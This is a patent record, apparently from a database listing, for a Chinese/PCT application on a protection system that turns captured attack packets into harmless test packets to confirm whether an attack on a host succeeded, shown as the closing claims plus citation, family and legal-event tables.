- 根据权利要求16所述的装置,其特征在于,所述处理单元,用于对所述攻击报文进行修改,将修改后的攻击报文作为所述测试报文。
- 根据权利要求17所述的装置,其特征在于,所述处理单元,用于将所述攻击报文包含的攻击命令替换为设定命令,所述设定命令用于触发命令执行方回应所述设定命令的执行结果。
- 根据权利要求18所述的装置,其特征在于,所述特定事件包括所述受攻击主机发送的执行结果与所述设定命令的预期结果相同,所述装置还包括:接收单元,用于接收所述受攻击主机发送的针对所述测试报文的响应报文;所述处理单元,用于从所述响应报文中解析获得所述响应报文中携带的所述受攻击主机对所述设定命令的执行结果;确定所述响应报文中携带的执行结果与所述设定命令对应的预期结果相同。
- 根据权利要求18所述的装置,其特征在于,所述特定事件包括所述受攻击主机发送的执行结果满足所述设定命令对应的正则表达式,所述装置还包括:接收单元,用于接收所述受攻击主机发送的针对所述测试报文的响应报文;所述处理单元,用于从所述响应报文中解析获得所述响应报文中携带的所述受攻击主机对所述设定命令的执行结果;确定所述响应报文中携带的执行结果满足所述设定命令对应的正则表达式。
- 根据权利要求17所述的装置,其特征在于,所述处理单元,用于将所述攻击报文包含的地址信息替换为取证服务器对应的地址信息。
- 根据权利要求21所述的装置,其特征在于,所述特定事件包括在所述测试报文的发送时间点之后所述受攻击主机访问所述取证服务器,所述处理单元,用于获取所述取证服务器在所述测试报文的发送时间点之后的被访问记录;若所述被访问记录中存在所述受攻击主机对应的记录,则确定所述在所述测试报文的发送时间点之后所述受攻击主机访问所述取证服务器。
- 根据权利要求16所述的装置,其特征在于,所述攻击报文用于指示所述受攻击主机创建或者修改指定文件,所述攻击报文包括所述指定文件的标识,所述处理单元,用于基于所述攻击报文包含的所述指定文件的标识,生成所述测试报文,所述测试报文用于请求访问所述指定文件。
- 根据权利要求23所述的装置,其特征在于,所述特定事件包括所述指定文件被成功访问,所述处理单元,用于从所述测试报文之后的所述受攻击主机相关的数据流中获得所述受攻击主机发送的针对所述测试报文的响应报文;若所述响应报文中的超文本传输协议HTTP响应码是表示成功的响应码,确定所述指定文件被成功访问。
- 根据权利要求23所述的装置,其特征在于,所述特定事件包括所述指定文件被成功访问,所述处理单元,用于从所述测试报文之后的所述受攻击主机相关的数据流中获得所述受攻击主机发送的针对所述测试报文的响应报文;若所述响应报文的报文体中存在设定字符串,确定所述第一攻击事件为攻击成功事件,所述设定字符串表示所述指定文件被成功访问。
- 一种防护系统,其特征在于,包括:处理器,所述处理器与存储器耦合,所述存储器中存储有至少一条计算机程序指令,所述至少一条计算机程序指令由所述处理器加载并执行,以使所述防护系统实现权利要求1-15中任一项所述的方法。
- 一种计算机程序产品,其特征在于,所述计算机程序产品包括一个或多个计算机程序指令,当所述计算机程序指令被计算机加载并运行时,使得所述计算机执行权利要求1至15中任意一项所述的攻击成功识别方法。
- 一种计算机可读存储介质,其特征在于,所述存储介质中存储有至少一条指令,所述指令在计算机上运行时,使得计算机执行如权利要求1至15中任意一项所述的攻击成功识别方法。
Applications Claiming Priority (2)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202111602601.6 | 2021-12-24 | ||
CN202111602601.6A CN116346381A (zh) | 2021-12-24 | 2021-12-24 | 攻击成功识别方法及防护系统 |
Publications (1)
Publication Number | Publication Date |
---|---|
WO2023116045A1 true WO2023116045A1 (zh) | 2023-06-29 |
Family
ID=86890219
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
PCT/CN2022/116571 WO2023116045A1 (zh) | 2021-12-24 | 2022-09-01 | 攻击成功识别方法及防护系统 |
Country Status (2)
Country | Link |
---|---|
CN (1) | CN116346381A (zh) |
WO (1) | WO2023116045A1 (zh) |
Cited By (2)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN117527354A (zh) * | 2023-11-08 | 2024-02-06 | 北京微步在线科技有限公司 | 一种攻击检测方法、装置、电子设备及存储介质 |
CN117896175A (zh) * | 2024-03-04 | 2024-04-16 | 北京浩瀚深度信息技术股份有限公司 | 一种通过漏洞传播的恶意样本的捕获方法 |
Citations (4)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US20140196105A1 (en) * | 2013-01-09 | 2014-07-10 | Delta Electronics, Inc. | Cloud system with attack protection mechanism and protection method using for the same |
CN108881263A (zh) * | 2018-06-29 | 2018-11-23 | 北京奇虎科技有限公司 | 一种网络攻击结果检测方法及系统 |
CN110472414A (zh) * | 2019-07-23 | 2019-11-19 | 中国平安人寿保险股份有限公司 | 系统漏洞的检测方法、装置、终端设备及介质 |
CN113660265A (zh) * | 2021-08-16 | 2021-11-16 | 北京天融信网络安全技术有限公司 | 一种网络攻击测试方法、装置、电子设备及存储介质 |
-
2021
- 2021-12-24 CN CN202111602601.6A patent/CN116346381A/zh active Pending
-
2022
- 2022-09-01 WO PCT/CN2022/116571 patent/WO2023116045A1/zh unknown
Patent Citations (4)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US20140196105A1 (en) * | 2013-01-09 | 2014-07-10 | Delta Electronics, Inc. | Cloud system with attack protection mechanism and protection method using for the same |
CN108881263A (zh) * | 2018-06-29 | 2018-11-23 | 北京奇虎科技有限公司 | 一种网络攻击结果检测方法及系统 |
CN110472414A (zh) * | 2019-07-23 | 2019-11-19 | 中国平安人寿保险股份有限公司 | 系统漏洞的检测方法、装置、终端设备及介质 |
CN113660265A (zh) * | 2021-08-16 | 2021-11-16 | 北京天融信网络安全技术有限公司 | 一种网络攻击测试方法、装置、电子设备及存储介质 |
Cited By (2)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN117527354A (zh) * | 2023-11-08 | 2024-02-06 | 北京微步在线科技有限公司 | 一种攻击检测方法、装置、电子设备及存储介质 |
CN117896175A (zh) * | 2024-03-04 | 2024-04-16 | 北京浩瀚深度信息技术股份有限公司 | 一种通过漏洞传播的恶意样本的捕获方法 |
Also Published As
Publication number | Publication date |
---|---|
CN116346381A (zh) | 2023-06-27 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US11736499B2 (en) | Systems and methods for detecting injection exploits | |
CN112383546B (zh) | 一种处理网络攻击行为的方法、相关设备及存储介质 | |
US10567431B2 (en) | Emulating shellcode attacks | |
US10200384B1 (en) | Distributed systems and methods for automatically detecting unknown bots and botnets | |
Yan et al. | Software-defined networking (SDN) and distributed denial of service (DDoS) attacks in cloud computing environments: A survey, some research issues, and challenges | |
Ndatinya et al. | Network forensics analysis using Wireshark | |
US11831420B2 (en) | Network application firewall | |
US20190253453A1 (en) | Implementing Decoys In A Network Environment | |
US7774832B2 (en) | Systems and methods for implementing protocol enforcement rules | |
WO2023116045A1 (zh) | 攻击成功识别方法及防护系统 | |
Bortolameotti et al. | Decanter: Detection of anomalous outbound http traffic by passive application fingerprinting | |
EP3297248B1 (en) | System and method for generating rules for attack detection feedback system | |
US20060242701A1 (en) | Method and system for preventing, auditing and trending unauthorized traffic in network systems | |
US12039048B2 (en) | System and method for automatic generation of malware detection traps | |
JP7388613B2 (ja) | パケット処理方法及び装置、デバイス、並びに、コンピュータ可読ストレージ媒体 | |
Auxilia et al. | Anomaly detection using negative security model in web application | |
Jeyanthi | Internet of things (IoT) as interconnection of threats (IoT) | |
KR20200045400A (ko) | 네트워크 보안 기능 인터페이스를 위한 보안 정책 번역 | |
Oliveri et al. | Sagishi: An undercover software agent for infiltrating IoT botnets | |
Ezeife et al. | SensorWebIDS: a web mining intrusion detection system | |
WO2022156197A1 (zh) | 攻击成功识别方法及防护设备 | |
WO2024139775A1 (zh) | 安全服务处理方法、装置、设备、存储介质及程序产品 | |
Cui | Automating malware detection by inferring intent | |
Bezborodov | Intrusion Detection Systems and Intrusion Prevention System with Snort provided by Security Onion. | |
AR | Identifying SOA security threats using web mining |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
121 | Ep: the epo has been informed by wipo that ep was designated in this application |
Ref document number: 22909370 Country of ref document: EP Kind code of ref document: A1 |
|
NENP | Non-entry into the national phase |
Ref country code: DE |